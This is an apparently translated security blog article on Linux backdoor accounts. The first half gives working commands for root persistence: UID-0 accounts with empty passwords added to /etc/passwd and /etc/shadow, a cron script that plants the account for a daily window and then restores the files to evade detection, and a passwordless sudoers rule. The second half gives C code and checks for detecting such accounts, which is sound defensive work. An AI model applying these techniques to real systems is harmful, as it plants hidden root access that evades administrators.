Linux Hackers/Suspicious Account Detection

Time: 2022-12-24 16:08:53

catalog

. Linux hacker account attack vectors
. Linux suspicious account detection model

1. Linux hacker account attack vectors

0x1: Add the hacker account to the "root" group

. useradd hacker -p hacker123
. usermod -a -G root hacker
. id hacker


0x2: Add a system account without using system commands

. vim /etc/passwd
Add a line: musicyxy:x:0:0::/:/bin/bash
. vim /etc/shadow
Add a line: musicyxy::::::::
// save and quit with :wq!

0x3: Hiding the account with crontab

. Use crontab (scheduled tasks) to hide the hacker account
. Back up the forged passwd and shadow files used to hide the hacker account somewhere else (e.g. /tmp/passwd, /tmp/shadow); the original files (/etc/passwd, /etc/shadow) stay unchanged
. Append the two entries musicyxy:x:0:0::/:/bin/sh and musicyxy:::::::: to the forged passwd and shadow files
. Then, at a fixed time each day, swap the forged passwd and shadow files into /etc/, keeping a backup of the original normal files; once that time window has passed, restore the original files
. This way we can log in to the system during the period in which the forged files are in effect; when we are not logging in, the forged files are automatically reverted to the normal ones, which makes it harder for the administrator to notice

shell

#!/bin/bash
# at 11:40 every day back up the originals: cat /etc/passwd > /dev/ttypwd
echo '40 11 * * * cat /etc/passwd > /dev/ttypwd' >> /etc/door.cron;
echo '40 11 * * * cat /etc/shadow > /dev/ttysdw' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow' >> /etc/door.cron;
# at 12:09 every day roll back the original passwd and shadow files
echo '09 12 * * * cat /dev/ttypwd > /etc/passwd' >> /etc/door.cron;
echo '09 12 * * * cat /dev/ttysdw > /etc/shadow' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttypwd' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttysdw' >> /etc/door.cron;
service crond restart;
crontab /etc/door.cron;

With this, the backdoor account's daily window of existence is 11:40~12:09

0x4: Add a non-root account with UID=0

. Add a normal user: useradd hacker -p hacker123
// the newly created user gets a home directory /home/hacker
. Delete the user's home directory: rm -rf /home/hacker
. Grant privileges:
vim /etc/passwd
Change the new user's uid and gid to 0:
hacker:x:<uid>:<gid>::/home/hacker:/bin/bash -> hacker:x:0:0::/home/hacker:/bin/bash
or
useradd -u 0 -o -g root -G root -d /home/hacker hacker

0x5: Hiding a privileged account via sudo

Wherever the sudoers file lives, sudo provides a command for editing it: visudo. It validates the configuration for you and, if something is wrong, tells you which section is incorrect when you save and exit.

<user list> <host list> = <operator list> <tag list> <command list>
//hacker ALL=(ALL) NOPASSWD: ALL
. user list: users/groups, or a previously defined user alias list; a user is written as its username, a group with a % prefix, e.g. %admin
. host list: hostnames or an alias list
. operator list: the runas user, i.e. which user's or group's privileges the command is executed with
. tag list: the one used most often is NOPASSWD: with this tag no password needs to be entered
. command list: the command or list of commands that may be executed

Hacker attack technique

. vim /etc/sudoers
. Add a line: hacker ALL=(ALL) NOPASSWD: ALL
. sudo -u root /mnt/sudodir/cmd, no password required
. This lets the hacker user switch to any user and execute any command

Relevant Link:

http://read.newbooks.com.cn/info/156976.html
http://network810.blog.51cto.com/2212549/1133349
http://jingyan.baidu.com/article/5bbb5a1b5cf43513eba179b5.html
http://www.linux521.com/2009/system/201005/11198.html
https://linux.cn/article-2655-1.html
http://chenall.net/post/linux-sudo-config/

2. Linux suspicious account detection model

0x1: Detect non-root users in the root group

. Get the current list of accounts with the Bash command: cut -d: -f1 /etc/passwd
. Iterate over the list, calling getpwnam and getgrgid to obtain each account's pw_name, pw_uid and pw_gid
. Check for abnormal accounts:
) a non-root account with uid 0
) a non-root account with gid 0
) a non-root account whose shell is /bin/bash or /bin/sh (rather than /sbin/nologin)

Code Example

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <grp.h>
#include <pwd.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>

void getUserInfo(const char *name)
{
    struct passwd *pw;
    struct group *grp;

    if (name == NULL)
    {
        return;
    }

    // getpwnam() returns a pointer to static storage, so no malloc is needed
    pw = getpwnam(name);
    if (!pw)
    {
        printf("Couldn't find out about user %s, %d.\n", name, errno);
        return;
    }
    printf("User login name is %s.\n", pw->pw_name);
    printf("User uid is %d.\n", (int) (pw->pw_uid));
    printf("User gid is %d.\n", (int) (pw->pw_gid));
    printf("User home directory is %s.\n", pw->pw_dir);
    printf("User default shell is %s.\n", pw->pw_shell);

    // group info
    grp = getgrgid(pw->pw_gid);
    if (!grp)
    {
        printf("Couldn't find out about group %d.\n", (int) pw->pw_gid);
        return;
    }
    printf("User default group is %s (%d).\n", grp->gr_name, (int) (pw->pw_gid));
    return;
}

int main()
{
    FILE *fp = popen("cut -d: -f1 /etc/passwd", "r");
    if (fp == NULL)
    {
        return 1;
    }
    char line[256];
    while (fgets(line, sizeof(line), fp) != NULL)
    {
        // strip the trailing newline, otherwise getpwnam() will not match the name
        line[strcspn(line, "\n")] = '\0';
        //std::cout << line;
        getUserInfo((const char *) line);
    }
    pclose(fp);
    return 0;
}
// g++ healthchcker.cpp -o healthchcker
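A compact checker for the three 0x1 rules, written for this page as an added example (it is not the author's healthchcker code): it parses raw /etc/passwd lines itself instead of going through getpwnam(), so an entry with an empty or non-numeric uid/gid field, the kind a hand-edited file from 0x2 can contain, is reported as malformed rather than silently interpreted. The function name check_passwd_entry and the SUSP_* flags are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { SUSP_UID0 = 1,        /* non-root account whose uid is 0 */
       SUSP_GID0 = 2,        /* non-root account whose gid is 0 */
       SUSP_SHELL = 4,       /* non-root account with /bin/bash or /bin/sh */
       SUSP_MALFORMED = 8 }; /* wrong field count, or empty/non-numeric uid or gid */
enum { NFIELDS = 7, FLEN = 128 };
#define IS_NUMERIC(s) ((s)[0] != '\0' && (s)[strspn((s), "0123456789")] == '\0')

/* Split one passwd line into its colon-separated fields; returns the count, -1 on overflow. */
static int split_fields(const char *p, char f[NFIELDS][FLEN])
{
    for (int n = 0; n < NFIELDS; ) {
        size_t len = strcspn(p, ":\n");
        if (len >= FLEN) return -1;
        memcpy(f[n], p, len);
        f[n++][len] = '\0';
        if (p[len] != ':') return n;   /* end of line reached */
        p += len + 1;
    }
    return -1;                         /* more than 7 fields */
}

/* Apply the section 0x1 rules to one raw passwd line; returns 0 or a bitmask of SUSP_* flags. */
int check_passwd_entry(const char *line)
{
    char f[NFIELDS][FLEN];
    int flags = 0;
    if (split_fields(line, f) != NFIELDS) return SUSP_MALFORMED;
    if (strcmp(f[0], "root") == 0) return 0;          /* root itself is expected to be 0:0 */
    if (!IS_NUMERIC(f[2]) || !IS_NUMERIC(f[3])) return SUSP_MALFORMED;
    if (strtol(f[2], NULL, 10) == 0) flags |= SUSP_UID0;
    if (strtol(f[3], NULL, 10) == 0) flags |= SUSP_GID0;
    if (strcmp(f[6], "/bin/bash") == 0 || strcmp(f[6], "/bin/sh") == 0) flags |= SUSP_SHELL;
    return flags;
}

/* Stand-alone use: scan /etc/passwd (or a copied file given as argv[1]) and report findings. */
int main(int argc, char **argv)
{
    char line[1024];
    FILE *fp = fopen(argc > 1 ? argv[1] : "/etc/passwd", "r");
    if (!fp) { perror("fopen"); return 1; }
    for (int flags; fgets(line, sizeof line, fp); )
        if ((flags = check_passwd_entry(line)) != 0) printf("suspicious (flags=%d): %s", flags, line);
    fclose(fp);
    return 0;
}
```

Run it against a copy of the passwd file taken from a backup as well as the live one, since the crontab trick in 0x3 means the live file is only modified inside a short daily window.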

Relevant Link:

http://blog.csdn.net/xocoder/article/details/8987135
http://pubs.opengroup.org/onlinepubs/009695399/basedefs/pwd.h.html
https://www.mkssoftware.com/docs/man5/struct_group.5.asp
http://www.embedu.org/column/Column185.htm
http://www.cnblogs.com/hnrainll/archive/2011/05/07/2039692.html

0x2: Detecting abnormal /etc/sudoers configuration

. Open /etc/sudoers
. Handle include directives recursively
. Check whether any suspicious configuration exists other than "root ALL=(ALL) ALL"

0x3: /etc/passwd and /etc/shadow permission checks

Standard baseline permissions

. /etc/passwd: "other" should not have write permission
. /etc/shadow: "other" should not have write permission

Copyright (c) 2015 LittleHann All rights reserved